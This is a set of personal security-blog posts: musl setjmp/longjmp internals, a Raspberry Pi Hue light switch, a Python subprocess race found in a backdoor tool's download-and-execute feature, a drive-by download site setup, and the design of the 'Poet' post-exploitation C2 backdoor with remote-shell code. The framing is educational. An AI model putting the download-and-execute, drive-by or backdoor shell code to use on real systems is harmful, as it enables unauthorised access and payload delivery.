Mark Mossberg’s Blog

Hacker Nonsense

Let’s Understand: Setjmp()/longjmp()

Pretty recently I learned about setjmp() and longjmp(). They’re a neat pair of libc functions which allow you to save your program’s current execution context and resume it at an arbitrary point in the future (with some caveats1). If you’re wondering why this is particularly useful, to quote the manpage, one of their main use cases is “…for dealing with errors and interrupts encountered in a low-level subroutine of a program.” These functions can be used for more sophisticated error handling than simple error code return values.

I was curious how these functions worked, so I decided to take a look at musl libc’s implementation for x86. First, I’ll explain their interfaces and show an example usage program. Next, since this post isn’t aimed at the assembly wizard, I’ll cover some basics of x86 and Linux calling convention to provide some required background knowledge. Lastly, I’ll walk through the source, line by line.

Interfaces

1
int setjmp(jmp_buf env);

setjmp() takes a single jmp_buf opaque type, returns 0, and continues execution afterward normally. A jmp_buf is the structure that setjmp() will save the calling execution context in. We’ll examine it more closely later on.

1
void longjmp(jmp_buf env, int val);

longjmp() takes a jmp_buf and an int, simply returning back the given int value (unless it was 0, in which case it returns 1). The unusual aspect is that when it returns, the program’s execution resumes as if setjmp() had just been called. This allows the user to jump back an arbitrary amount of frames on the current call stack (presumably out of some deep routine which had an error). The return value allows the code following the setjmp() call to differentiate if setjmp() or longjmp() had just been called, and proceed accordingly.

Here’s a simple example.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
#include <setjmp.h>
#include <stdio.h>

void fancy_func(jmp_buf env);

int main() {
    jmp_buf env;
    int ret = setjmp(env);
    if (ret == 0) {
        puts("just returning from setjmp!");
        fancy_func(env);
    } else {
        puts("now returning from longjmp and exiting!");
    }

}

void fancy_func(jmp_buf env) {
    puts("doing fancy stuff");
    longjmp(env, 1);
}

Output:

1
2
3
4
$ ./main
just returning from setjmp!
doing fancy stuff
now returning from longjmp and exiting!

The above code creates a jmp_buf and calls setjmp(), saving the current execution context. Since setjmp() returns 0, the code follows the first branch, calling fancy_func() and forwarding on the jmp_buf. fancy_func() does some fancy stuff, then calls longjmp(), passing in the jmp_buf and 1. Execution returns to the if statement on line 9, except this time, ret is 1 instead of 0, because we’re returning from longjmp(). Now the code follows the else path which prints and exits. 2

Background Knowledge

I’ve mentioned “execution context” a few times, but let’s make that a little more concrete. In this case, a program’s execution context can be defined by the state of the processor’s registers.

On x86, the relevant registers are the general purpose, index, and pointer registers.

1
2
3
General Purpose: eax, ebx, ecx, edx
Index:           esi, edi
Pointer:         ebp, esp, eip

ebx, ecx, edx, esi, and edi don’t have particularly special meaning here and can be thought of as arbitrary 32 bit storage locations. However eax, ebp, and eip are a little different.

  • eax is used for function return values (specified by the cdecl calling convention)
  • ebp, the frame pointer, contains a pointer to the start of the current stack frame.
  • eip, the instruction pointer, contains a pointer to the next instruction to execute.

With this in mind, I initially thought that a jmp_buf would be an array of 9 ints or something, in order to hold each register.

As it happens, jmp_buf is instead declared as (link):

1
2
3
4
5
typedef struct __jmp_buf_tag {
    __jmp_buf __jb;
    unsigned long __fl;
    unsigned long __ss[128/sizeof(long)];
} jmp_buf[1];

And for x86, __jmp_buf is declared as (link):

1
typedef unsigned long __jmp_buf[6];

I had never seen this syntax of using bracket operators at the end of a typedef but searched and found out that the __jmp_buf declaration declares a fixed size array of 6 unsigned longs, and the jmp_buf declaration declares an array of 1 struct __jmp_buf_tag. The reason for the array of 1 is so the pointer semantics of arrays kick in and the struct __jmp_buf_tag is actually passed by reference in calls to setjmp()/longjmp() (as opposed to being copied).

Anyway, apparently my guess of 9 ints was incorrect, and it’s actually 6 (longs).

Before we can dig into the source to understand why this is, we need to understand what the state of the program stack is at the point setjmp() is called, and to do that, we need to understand which calling convention is being used. Since we assume x86 Linux, this will be cdecl. The relevant parts of cdecl for this case are:

  • arguments passed on the stack
  • integer values and memory addresses returned in eax (as mentioned above)
  • eax, ecx, edx are caller saved, the rest are callee saved

setjmp()’s code executes immediately after setjmp()’s call instruction, so at the point the first instruction of setjmp() executes, the stack looks something like this.

1
2
3
4
5
6
7
8
9
10
11
12
> high memory <
| ...                       |
| caller's caller saved eip |
| caller's caller saved ebp | < ebp
| caller stack var 1        | // caller's stack frame
| caller stack var 2        |
| caller stack var ...      |
| caller stack var n        |
| pointer to jmp_buf        | // argument to setjmp
| caller saved eip          | < esp
+---------------------------+ // setjmp's stack frame
> low memory <

(In this illustration, the stack grows down.)

At the top of the stack is the eip value that the call instruction pushed, or where to return to after setjmp() finishes. Above that is the first, and only argument, the pointer to the given jmp_buf. Lastly, above that is the caller’s stack frame. esp points to the top of the stack as usual, and ebp is still pointing to the start of the caller’s stack frame. Usually the first thing a function does is push ebp on the stack, and set ebp to esp to now point to the current stack frame (a.k.a the prologue), but since setjmp() is such a minimal function, it doesn’t do this. Furthermore, since ebp is one of the registers that needs to be saved, setjmp() needs it to be unperturbed.

After setjmp() returns, the stack will look something like this:

1
2
3
4
5
6
7
8
9
10
11
> high memory <
| ...                       |
| caller's caller saved eip |
| caller's caller saved ebp | < ebp
| caller stack var 1        | // caller's stack frame
| caller stack var 2        |
| caller stack var ...      |
| caller stack var n        |
| pointer to jmp_buf        | < esp
+---------------------------+
> low memory <

It’s nearly identical, except eip has been popped off the stack, and is now executing the next instruction after the caller’s call setjmp. esp has also been updated accordingly. This is the state of the program that setjmp() will need to record, and that longjmp() will restore.

Before reading the source I tried to reason about what I expected would happen. I presume:

  • General purpose and index registers (eax, ebx, ecx, edx, esi, edi) which don’t have any effect on control flow can be trivially saved and restored
  • ebp can similarly be saved “as is”, since its value when setjmp() executes is exactly what it needs to be restored to in longjmp()
  • esp cannot be saved “as is” because when setjmp() executes, there is the extra eip on the stack that is not there after the function returns. Therefore, the value for esp that should be saved is esp+4 to match the expected state of the stack after return
  • The eip that should be saved is the address of the instruction after the call setjmp instruction, which can be retrieved from the top of the stack by dereferencing esp

With all that out of the way, let’s read the source (all annotations by me) (link). Since this type of low level register manipulation isn’t available from C (modulo compiler intrinsics), both of these functions are necessarily written in assembly.

1
2
3
4
5
6
7
8
9
10
11
12
setjmp:
    mov 4(%esp), %eax     ; get pointer to jmp_buf, passed as argument on stack
    mov    %ebx, (%eax)   ; jmp_buf[0] = ebx
    mov    %esi, 4(%eax)  ; jmp_buf[1] = esi
    mov    %edi, 8(%eax)  ; jmp_buf[2] = edi
    mov    %ebp, 12(%eax) ; jmp_buf[3] = ebp
    lea 4(%esp), %ecx     ; get previous value of esp, before call
    mov    %ecx, 16(%eax) ; jmp_buf[4] = esp before call
    mov  (%esp), %ecx     ; get saved caller eip from top of stack
    mov    %ecx, 20(%eax) ; jmp_buf[5] = saved eip
    xor    %eax, %eax     ; eax = 0
    ret                   ; pop stack into eip

The first line retrieves the argument off the stack, placing a pointer to the jmp_buf (remember, an array of 6 unsigned longs) in eax. It then moves ebx, esi, edi, and ebp “as is” into the int array. It adds 4 to esp with a lea and stores that next. Next, it dereferences esp and stores that in the last slot in the array. Lastly, it zeroes out eax and returns.

The final state of the jmp_buf after setjmp() returns looks like:

1
2
   0    1    2    3    4    5
[ ebx, esi, edi, ebp, esp, eip ]

Now let’s look at longjmp() (link).

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
longjmp:
    mov  4(%esp),%edx ; get pointer to jmp_buf, passed as argument 1 on stack
    mov  8(%esp),%eax ; get int val in eax, passed as argument 2 on stack
    test    %eax,%eax ; is int val == 0?
    jnz 1f
    inc     %eax      ; if so, eax++
1:
    mov   (%edx),%ebx ; ebx = jmp_buf[0]
    mov  4(%edx),%esi ; esi = jmp_buf[1]
    mov  8(%edx),%edi ; edi = jmp_buf[2]
    mov 12(%edx),%ebp ; ebp = jmp_buf[3]
    mov 16(%edx),%ecx ; ecx = jmp_buf[4]
    mov     %ecx,%esp ; esp = ecx
    mov 20(%edx),%ecx ; ecx = jmp_buf[5]
    jmp *%ecx         ; eip = ecx

The first two lines retrieve the arguments (pointer to jmp_buf, int return val) from the stack into edx and eax, respectively. The int val is incremented to 1 if it is 0, according to the spec. Next, ebx, esi, edi, and ebp are reset to their saved state, stored in the jmp_buf, in a straightforward manner. As you can see, both setjmp() and longjmp() need to precisely agree on where each particular register is saved in the jmp_buf. esp is mysteriously restored in an indirect manner, via ecx3 and finally, eip is reset to the saved state via an indirect jump.

So I was mostly correct, but it seems like eax, ecx, and edx were not saved in the jmp_buf! If we look back on the details of cdecl, it becomes clear why.

  • eax doesn’t need to be saved, because it is reserved for the return value
  • ecx and edx are caller saved. This means that a callee subroutine is free to trash these registers, and it is the responsibility for the caller to save and restore them after the subroutine returns. Because of this, if the function that calls setjmp() needs to use ecx or edx after the call, it will already have code to save and restore those registers before and after the function call. Since longjmp() resumes execution as if setjmp() had immediately returned, execution will automatically hit the code that restores ecx and edx, making it unnecessary to save them in the jmp_buf.

This is just one example of how great musl libc is at providing an understandable resource for learning the internals of systems software. I often find myself referencing it when I’m curious about libc internals, and if you’re not familiar with it, I highly recommend checking it out!


  1. Mainly, that the function which called setjmp() cannot have returned before the corresponding longjmp() call.

  2. A slight aside: This situation where a function returns different values based on the execution context also appears in fork(), in which the caller uses the return value to differentiate whether it is now executing in the child or parent process.

  3. I actually have no good explanation for this and am pretty curious why it’s done this way. Something like mov $esp, [$edx+16] is a perfectly valid instruction (tested with rasm2)! I asked on the musl mailing list, but no one responded :(. If you have an explanation, please let me know!

Building a Simple IoT Light Switch, Pt. 2

This is a pretty late post, but I wanted to show off the hardware I designed as a follow up to the first “Building a Simple IoT Light Switch”. In that post I presented a prototype of a smart light switch I designed that consisted of a button which triggered a small Python server running on a Raspberry Pi to control my Phillips Hue lights over an HTTP API. It was an extraordinarily simple design that worked well enough, how it was very inconvenient to transport since I had to rewire the breadboard to the raspi GPIO pins every time I moved. Since it seemed production ready for my needs, I decided to solve this problem by using this as an opportunity to learn PCB design and actually design a production board.

Special thanks go to Nick Kubasti for teaching me how to use KiCad and to John Sullivan for helping me with the final lab work.

The basic circuit I designed is below. It is merely a GPIO pin hooked up to ground with a switch in between, and an LED and resistor for fun.

The code behind this configures the GPIO pin to use a pull up resistor, which pulls the pin’s voltage up to VCC when the button is not pressed, and down to GND when it is. This lets the code poll for when the pin’s value is False. A more complete schematic including the pull up resistor is below. Note that I won’t have to implement the pull up part in my design because the Raspberry Pi implements that internally.

My initial idea was to have a little board that would plug straight down into the Pi’s GPIO male headers with a little button and LED at the end. However, that was really wasteful since that would block all of the pins even though I was only using three of them (input, GND, VCC). Nick suggested a board design that had two sets of headers: one set of female ones for plugging downwards as I had originally thought, and one set of male ones facing upward that all the unused pins would be forwarded to. This way, even though the downward facing female pins are all plugged in, they can all still be accessed since the board traces simply connect the unused female pins to the corresponding male ones. The exception to this is GPIO pin 11, which is the one actually being used for the switch. I just need to remember for future projects that pin 11 is reserved. That was probably really hard to understand, so here’s the schematic, created with KiCad.

On the left you can see the two sets of 13 x 2 headers. The ones on the left will be the female ones that plug downward into the Pi’s male headers. The ones on the right will be the male ones that can be used for other projects. All those wires going around the top and bottom are the forwarded connections. The one pin exclusively in use on the left is pin 11, which is connected to the circuit. All the rest are unused, and wires are used to connect them to their corresponding male header. Pins 1 and 9 are technically in use, but since they correspond to VCC and GND, it’s fine to forward them too.

The actual circuit is in the bottom left. It’s very similar to the above circuit diagrams, pin 11 is connected to GND (pin 9) via a switch, and 3.3V VCC (pin 1) is connected to an LED, resistor, and the same GND (pin 9).

The next step after creating the schematic, and assigning actual parts to each of the components, was to design the printed circuit board (PCB). This involves laying out the components as they will appear on the physical silicon wafer.

This was a completely new area to me and it was challenging and fun to actually draw out the board’s traces, taking care not to intersect them, and using the different layers when necessary. You might notice that there’s a seemingly random set of 1 x 2 headers in the middle of the area where the switch goes. I added those because I noticed that the button and LED were going to actually extend off the end of the Pi. I was concerned about how pressing down on the button would actually flip the Pi a little bit, so Nick had an incredible idea and suggested adding space for a pair of dud headers that could be used as legs to support the end of the PCB that hung off the side of the Pi.

After this, I was then able to pretty easily use KiCad to generate some Gerber files to send to the fab. I chose to use OshPark based on Nick’s recommendation, and they turned out to be a great option. I was able to get three copies of my board, with free shipping for <$8!

After waiting a couple of weeks for the boards to come in, John helped me solder everything together to finish up this project. During this process we noticed one design mistake: the layout of the switch was actually way too big for the switch we had on hand, but that didn’t turn out to be a serious issue.

There are some pictures of the final product:

Here’s a video of it in action:

A video posted by Mark Mossberg (@mssbrg) on

Thanks for reading! I have two extra boards I’m not doing anything with, so if you happen to have a Raspberry Pi and some Hue lights, I’d be happy to give you the hardware and software for your own DIY light switch.

Off to the (Python Internals) Races

This post is about an interesting race condition bug I ran into when working on a small feature improvement for poet a while ago that I thought was worth writing a blog post about.

In particular, I was improving the download-and-execute capability of poet which, if you couldn’t tell, downloads a file from the internet and executes it on the target. At the original time of writing, I didn’t know about the python tempfile module and since I recently learned about it, I wanted to integrate it into poet as it would be a significant improvement to the original implementation. The initial patch looked like this.

1
2
3
4
5
6
r = urllib2.urlopen(inp.split()[1])
with tempfile.NamedTemporaryFile() as f:
    f.write(r.read())
    os.fchmod(f.fileno(), stat.S_IRWXU)
    f.flush()  # ensure that file was actually written to disk
    sp.Popen(f.name, stdout=open(os.devnull, 'w'), stderr=sp.STDOUT)

This code downloads a file from the internet, writes it to a tempfile on disk, sets the permissions to executable, executes it in a subprocess. In testing this code, I observed some puzzling behavior: the file was never actually getting executed because it was suddenly ceasing to exist! I noticed though that when I used subprocess.call() or used .wait() on the Popen(), it would work fine, however I intentionally didn’t want the client to block while the file executed its arbitrary payload, so I couldn’t use those functions.

The fact that the execution would work when the Popen call waited for the process and didn’t work otherwise suggests that there was something going on between the time it took to execute the child and the time it took for the with block to end and delete the file, which is tempfile’s default behavior. More specifically, the file must have been deleted at some point before the exec syscall loaded the file from disk into memory. Let’s take a look at the implementation of subprocess.Popen() to see if we can gain some more insight:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
def _execute_child(self, args, executable, preexec_fn, close_fds,
                           cwd, env, universal_newlines,
                           startupinfo, creationflags, shell, to_close,
                           p2cread, p2cwrite,
                           c2pread, c2pwrite,
                           errread, errwrite):
            """Execute program (POSIX version)"""

            <snip>

            try:
                try:
                    <snip>
                    try:
                        self.pid = os.fork()
                    except:
                        if gc_was_enabled:
                            gc.enable()
                        raise
                    self._child_created = True
                    if self.pid == 0:
                        # Child
                        try:
                            # Close parent's pipe ends
                            if p2cwrite is not None:
                                os.close(p2cwrite)
                            if c2pread is not None:
                                os.close(c2pread)
                            if errread is not None:
                                os.close(errread)
                            os.close(errpipe_read)

                            # When duping fds, if there arises a situation
                            # where one of the fds is either 0, 1 or 2, it
                            # is possible that it is overwritten (#12607).
                            if c2pwrite == 0:
                                c2pwrite = os.dup(c2pwrite)
                            if errwrite == 0 or errwrite == 1:
                                errwrite = os.dup(errwrite)

                            # Dup fds for child
                            def _dup2(a, b):
                                # dup2() removes the CLOEXEC flag but
                                # we must do it ourselves if dup2()
                                # would be a no-op (issue #10806).
                                if a == b:
                                    self._set_cloexec_flag(a, False)
                                elif a is not None:
                                    os.dup2(a, b)
                            _dup2(p2cread, 0)
                            _dup2(c2pwrite, 1)
                            _dup2(errwrite, 2)

                            # Close pipe fds.  Make sure we don't close the
                            # same fd more than once, or standard fds.
                            closed = { None }
                            for fd in [p2cread, c2pwrite, errwrite]:
                                if fd not in closed and fd > 2:
                                    os.close(fd)
                                    closed.add(fd)

                            if cwd is not None:
                                os.chdir(cwd)

                            if preexec_fn:
                                preexec_fn()

                            # Close all other fds, if asked for - after
                            # preexec_fn(), which may open FDs.
                            if close_fds:
                                self._close_fds(but=errpipe_write)

                            if env is None:
                                os.execvp(executable, args)
                            else:
                                os.execvpe(executable, args, env)

                        except:
                            exc_type, exc_value, tb = sys.exc_info()
                            # Save the traceback and attach it to the exception object
                            exc_lines = traceback.format_exception(exc_type,
                                                                   exc_value,
                                                                   tb)
                            exc_value.child_traceback = ''.join(exc_lines)
                            os.write(errpipe_write, pickle.dumps(exc_value))

                        # This exitcode won't be reported to applications, so it
                        # really doesn't matter what we return.
                        os._exit(255)

                    # Parent
                    if gc_was_enabled:
                        gc.enable()
                finally:
                    # be sure the FD is closed no matter what
                    os.close(errpipe_write)

                # Wait for exec to fail or succeed; possibly raising exception
                # Exception limited to 1M
                data = _eintr_retry_call(os.read, errpipe_read, 1048576)

                <snip>

The _execute_child() function is called by the subprocess.Popen class constructor and implements child process execution. There’s a lot of code here, but key parts to notice here are the os.fork() call which creates the child process, and the relative lengths of the following if blocks. The check if self.pid == 0 contains the code for executing the child process and is significantly more involved than the code for handling the parent process.

From this, we can deduce that when the subprocess.Popen() call executes in my code, after forking, while the child is preparing to call os.execve, the parent simply returns, and immediately exits the with block. This automatically invokes the f.close() function which deletes the temp file. By the time the child calls os.execve, the file has been deleted on disk. Oops.

I fixed this by adding the delete=False argument to the NamedTemporaryFile constructor to suppress the auto-delete functionality. Of course this means that the downloaded files will have to be cleaned up manually, but this allows the client to not block when executing the file and have the code still be pretty clean.

Main takeaway here: don’t try to Popen a NamedTemporaryFile as the last statement in the tempfile’s with block.

Building a Sketchy Website 101

Back in April, I won a free “.club” domain through gandi.net’s anniversary prize giveaway. I really didn’t need a “.club” domain in particular, so I thought it would be pretty fun to register a stereotypical “sketchy” domain and set it up as a drive-by download site or something, because while I’ve heard of doing this kind of thing, I’ve never actually done it before. Here’s a blog post walking through what I did. The usual disclaimer applies here: I did this purely for my own education and learning experience and am not responsible for anything you do with it.

Step 1: Register your sketchy domain

I chose http://freemoviedownload.club.

Step 2: Set up drive-by downloads

This involves configuring your web server to automatically set the Content-Type header of the resource you want to force download to application/octet-stream. That should make most web browsers trigger a download file prompt to actually download the file. Safari curiously doesn’t support prompts for downloaded file location like Chrome and Firefox, so in that case, it will immediately download the file to ~/Downloads.

I’m going to try to force a drive-by download of a jpg file, so I added the below config to my .htaccess file in Apache’s DocumentRoot.

.htaccess
1
2
3
<Files *.jpg>
        ForceType application/octet-stream
</Files>

That will force browers to download the image, rather than rendering it when a browser tries to access http://freemoviedownload.club/image.jpg, for example.

At this point, we’re technically done. We can send someone a link to a file and, assuming they say yes to the prompt (or use Safari), download it to their computer. But for some extra polish, I want to have an actual website with content and have the download come from that page.

Step 3: Redirect

We can accomplish this with a trivial Javascript redirect that executes after the page has loaded. We can even add a delay before the download happens to give them time to read the website or whatever. The redirect will need to be to the path configured in step 2, but this will give the illusion that the download is coming from the index.html page.

index.html
1
2
3
4
5
you have arrived at the official free movie download club! enjoy your download
<script type="text/javascript" charset="utf-8">
    function f() { document.location = 'dickbutt.jpg' }
    setTimeout(f, 2000);
</script>

That’s it! Anyone that browses to the website will automatically get a nice “dickbutt.jpg” image downloaded to their machine. Again, particularly effective against Safari and Chrome for Android, in my testing.

Building a Simple IoT Light Switch

I’m lucky enough to own a Philips Hue wireless lighting unit (thanks NUACM!) which essentially is this really awesome Internet of Things (IoT) product that lets me replace all my standard light bulbs with special RGB ones that can be controlled wirelessly. The bulbs communicate via ZigBee with a “Bridge” unit that is connected to my local network and hosts an HTTP API for interfacing with the lights. This API is used by the official Hue mobile app for controlling the lights, but is also publicly documented and totally hacker friendly. The lights are awesome, but it is a bit of a drag to have to use an app to turn them all off rather than having some physical switch 1, so I decided to fully embrace the IoT trend and use my Raspberry Pi to build a simple HTTP-fluent light switch for turning my lights on and off.

Hardware

The circuitry itself is literally as simple as it gets for this kind of thing, all I have is GPIO pin 11 on the board (BCM pin 17) connected to pin 6 (GND), with a switch in between. In my code, I’ll configure pin 17 to use an internal pull up resistor which will bring the voltage up to 3.3V when the button is not pressed and down to 0V when it is.

Software

The Raspberry Pi Python library makes it really easy to control circuits. For simplicity, my code uses a polling approach to detect when the button is pressed but the RPi library also supports real callbacks using threading.

1
2
3
4
5
6
7
8
def main():
    while True:
        inp = gpio.input(PIN)
        # pull up resistor will cause inp to be True when button is not
        # pressed and False when button is pressed
        if not inp:
            callback()
        time.sleep(BUTTON_SLEEP)

My callback() function consists of code that uses the Hue API to request a diagnostic of the lights, which comes back as a JSON blob with each light represented as an object. If no lights are on, it turns them on, otherwise turning them all off. Turning the lights on and off is as simple as submitting a PUT request to the API endpoint for each light with a JSON blob specifying the state to turn to (On=True, Off=False).

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
def callback():
    survey = requests.get(BASE + '/lights')
    survey = json.loads(survey.text)
    numlights = len(survey)
    # if any are on, turn all off.
    if any([survey[str(x)]['state']['on'] for x in range(1, numlights+1)]):
        for light in survey.keys():
            turn(light, False)
        print '[{}] Off'.format(datetime.datetime.now())
    else:  # else if all are off, then all on
        for light in survey.keys():
            turn(light, True)
        print '[{}] On'.format(datetime.datetime.now())


def turn(light, state):
    data = json.dumps({'on':state})
    requests.put(BASE + '/lights/{}/state'.format(light), data=data)

That’s it! I leave the script running in a tmux pane on the Pi and I can hit the button at any point to toggle the lights on and off. The full code is available on github.

For future work, it would be cool to integrate RF chips so the button wouldn’t have to be physically attached to the Pi and I could have a little remote control. I’ll leave that for another day. Thanks for reading, here it is in action!

A video posted by Mark Mossberg (@mssbrg) on


  1. Of course I could physically go to each light and flip the switch but manually turning off all three lights in my room is even more work than launching the app.

Poet: Beacon Based Post-Exploitation

Introduction

For the past eight months or so, I’ve been working sporadically on a side project of mine I call Poet. Poet is basically a tool for hackers that’s useful for post exploitation, that is, after you’ve initially exploited and gotten access to the computer you’re not supposed to have access to. Poet is useful because it essentially acts as a backdoor you can install into a system to help you maintain access once you’ve gotten your foot in the door.

As a disclaimer, I am building Poet purely for my own education and learning experience. The code is freely available because I think it might be useful to others interested in learning about this sort of thing. Use it responsibly.

I’ve learned a lot during the process of building this tool and I thought it would be cool to write a blog post (possibly more to come) documenting that process.

Motivation

The initial motivation for this project came from an experience I had participating in the 2014 Northeast Collegiate Cyber Defense Competition. In short, the competition requires a team of students to protect a small business IT infrastructure from a red team of hackers. Usually the red team is really good and completely owns you at some point or other throughout the competition, and at the end they tell you what they did and give you tips on how to improve. In particular, the red team told us that there was pre-installed “beaconing” malware on many of our systems from the start of the competition that would “phone home” to a command and control (C2) server every once in a while to get commands and tasks to execute on the target system. This idea was pretty interesting to me, and a basic implementation didn’t actually seem too hard to write, so I decided to give it a try, even though at this point, I had no experience with network programming.

v0.1

The first version of Poet was drastically different from the current form and was just about as simple and primitive as it gets for something like this. In this version, the client program (executed on target) would repeatedly attempt to connect to a socket (port 80 by default) on the server (attacker’s C2 server) at a specified interval. If the connection failed (server wasn’t running), the client would sleep, otherwise it would execute a command sent from the server, sending back the stdout of the command. The server simply maintained a queue of commands to execute and would one by one pop them off the queue and send them to the client, printing out the stdout when it came back. This was a great exercise to learn the basics of socket programming, but of course wasn’t very useful at all, for a number of reasons. First, ideally the client’s interval is very large so as to minimize network use and remain stealthy but that puts a hard limit on the rate at which commands can be executed. This system was also very inflexible because there was no way to reorder or edit commands in the queue, since the “user interface” was just a server script that was run with the commands to execute as arguments. Overall, a good start, but there was definitely much work ahead to actually make this a semi-realistic tool.

v0.2

The second version of Poet involved a pretty substantial redesign although one of the things to stay the same would be the high level client/server beaconing dynamic. This is far superior than having the client attempt to listen on the target’s end because in any sort of “real” scenario, the target will likely be behind a firewall that will reject incoming packets on arbitrary ports. The beaconing model will allow the tool to bypass most standard firewalls that aren’t specifically targeting it because outbound port 80 traffic is almost certainly allowed. I later changed the default port to 443 because it’s just as likely to be allowed out and because it could potentially avoid packet inspection, since traffic on 443 is usually encrypted.

Building on top of this model, there were a couple other brainstorms I had to build on top of v0.1. Instead of executing a single command for every ping, what about sending over multiple commands? What about a pastebin/gist URL to a script that the client would download and execute? These would help solve the rate limit problem because an arbitrary number of commands, instead of one, could be executed for each ping. What about user interface? What about creating an actual web user interface for managing the command queue that the client was pulling from each ping? This would help solve the flexibility problem.

While these would be relatively simple to add to v0.1, if I asked myself, “If I were a hacker, would I want to use this tool?” the answer would be “No way!” because I would only be able to interact with my target system via discrete scripts, and I would have to wait the ideally large time interval between pings to get any sort of feedback on my actions.

This made it obvious that I would have to move from a design where each ping from the client was an opportunity for the user to run x actions on the target, to a design where each ping from the client was an opportunity for the user to interactively control the client for an unlimited time, and perform actions on the target with continuous feedback. With this in mind, I opted to use a shell as the user interface on the server side since it seemed simpler to implement and I was more familiar with implementing a shell versus something like a web interface (which would likely have to have a shell built into it anyway for executing commands). The server design would be similar to that of v0.1 in that the server would only be running when the user wanted to control the client, and the client would use the inability to connect to the server as an sign to “go to sleep” for another interval, although this isn’t strictly necessary. Another server design I thought of would be an always-on model where the server would always answer the client’s ping with some kind of binary state value, which would work equally well, but wouldn’t be strictly necessary because state can be inferred as described above.

In designing the actual protocol the client and server use to communicate, I decided to use HTTP to mildly obfuscate the client’s initial check if the server is running. The client’s ping consists of a GET request for /style.css on the server 1. Of course, the server isn’t a real web server, but it temporarily masquerades as one for the purposes of the initial handshake and sends back a hardcoded HTTP response of some random css file, and launches the control shell for the user. At this point, the protocol used is as simple as it gets: size of the following data + the data itself. This being my first time doing socket programming, my implementation was a little weird and reserved the first five bytes of the data sent over the wire for the ASCII decimal representation of the size (¯\_(ツ)_/¯), but hey, it worked.

The majority of the work left for v0.2 was essentially deciding on the features that the control shell would have and implementing the “userland utilities” or commands you could run at the shell. The commands I thought of and implemented were:

  • exec: This was the first command I wrote. It executes one or more commands on the target, sending the stdout of all of them back in one big chunk of text. I later added a flag that would save the big chunk to a file in the archive directory. Useful for stuff like grabbing process dumps.
  • recon: Basically like exec, but the commands are pre-selected and are tailored towards “reconnaissance” purposes. Stuff like whoami, id, uname -a, w, etc.
  • shell: Launches an actual remote shell on the target (inside the original control shell). Was implemented really crudely in this version with the execution backend on the client simply being something like
1
subprocess.Popen(cmd, stdout=sp.PIPE, stderr=sp.STDOUT, shell=True).communicate()[0]
  • exfil: Exfiltrate files and saves to the archive directory. Pretty standard. Current implementation is pretty crude, and loads entire file into memory, rather than paging the data somehow.
  • selfdestruct: Exit the client and delete script on disk. Without this, the user would have to do something weird (nay, treasonous?) like killing the client’s process from its own remote shell to completely turn off the client.
  • dlexec: Download an executable from the internet and execute it. Also pretty standard, useful for upgrading or installing additional tools on target
  • exit: Pretty self explanatory, this tells the client that the server’s done for now and that the client can now go back to sleep and begin pinging again in one time interval.

This work resulted in a decently functional prototype that could feasibly be used for post-exploitation.

v0.3

Version 0.3 was a pretty arbitrary decision, but mostly involved significant refactoring of the backend code, with a couple new user facing features. One notable change was the refactoring of the entire codebase from imperative, C-style programming to object oriented style, which gave the code much better structure. The communications protocol was also slightly refactored to be more standard by reserving the first four bytes for the binary data size value which simultaneously conserved bytes sent over the wire and increased the maximum data that could be sent in one message between client and server. An additional shell command I implemented was called chint, standing for “change interval”, which lets the server change the client’s ping delay interval after the client’s been started.

All that’s great, but the most significant set of improvements in my opinion were related to fleshing out the remote shell feature. While it “worked” to a decent degree for most standard commands there were two main problems with it that kept it from being a “real” shell. For reference, here’s what the code looked like for executing commands in v0.2.

1
2
3
def cmd_exec(cmd):
    return sp.Popen(cmd, stdout=sp.PIPE, stderr=sp.STDOUT,
                    shell=True).communicate()[0]

For those that aren’t as familiar with Python’s subprocess library, this executes an arbitrary command line (cmd), sending the stderr to the stdout, and returns any stdout of the command.

The first problem was that the shell output was not continuous – when executing a command like ls -R /, which typically results in lots of scrolling output in a normal terminal, my remote shell would instead block on the server end while the client executed the command to its completion and sent over the entire stdout as one big piece. I solved this problem by adapting the code to continuously poll the stdout file descriptor for new lines of output, sending those over individually so that the server would get each line of output as soon as it was available.

The second problem was that if certain commands like ping were executed in the shell, the client would effectively become unusable because ping (when executed without the -c parameter) is usually ended by being sent a INT signal (SIGINT), typically by hitting Ctrl-C on the keyboard. The problem is, the client side had no mechanism to receive signals and send them to the running process, so it would be eternally running this unending process and the user would totally lose control of the target. To solve this problem, I needed a way for the client to simultaneously execute the requested command, and listen for messages from the server, presumably telling the client to end the running process. To do this, I learned to use the select() function which is an easy way for an application to multiplex data streams (in this case, the stdout of the running process, and the socket connection to the server) and process their data without requiring concurrency at the application level.

The resulting code from these two fixes is below. Select takes in multiple file descriptors (File objects in Python) and returns which ones are readable (in this example). After it returns, I can check which file descriptors it returned, and proceed accordingly. In the expected case where we can read from the process’s stdout file descriptor, we get a line of stdout from the process, forwarding it to the server immediately. In the exceptional case where we can read from the socket, we receive the message, making sure it contains the proper keyword to end the process (‘shellterm’) and terminating the process if it does.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
proc = sp.Popen(inp, stdout=sp.PIPE, stderr=sp.STDOUT, shell=True)
while True:
    readable = select.select([proc.stdout, s.s], [], [], 30)[0]
    for fd in readable:
        if fd == proc.stdout:  # proc has stdout/err to send
            output = proc.stdout.readline()
            if output:
                s.send(output)
            else:
                return
        elif fd == s.s:  # remote signal from server
            sig = s.recv()
            if sig == 'shellterm':
                proc.terminate()
                return

That’s all for v0.3. Again, the v0.3 decision was pretty arbitrary and I ultimately chose to ship it because all the other features I had lined up at the time were more labor intensive/experimental and I really wanted to get my fancy new remote shell into master :D.

Future Work

At this point, I’m pretty satisfied with the state of the project, but as always, there’s more work to be done. Here are some future features/ideas/improvements that may or may not ever get implemented:

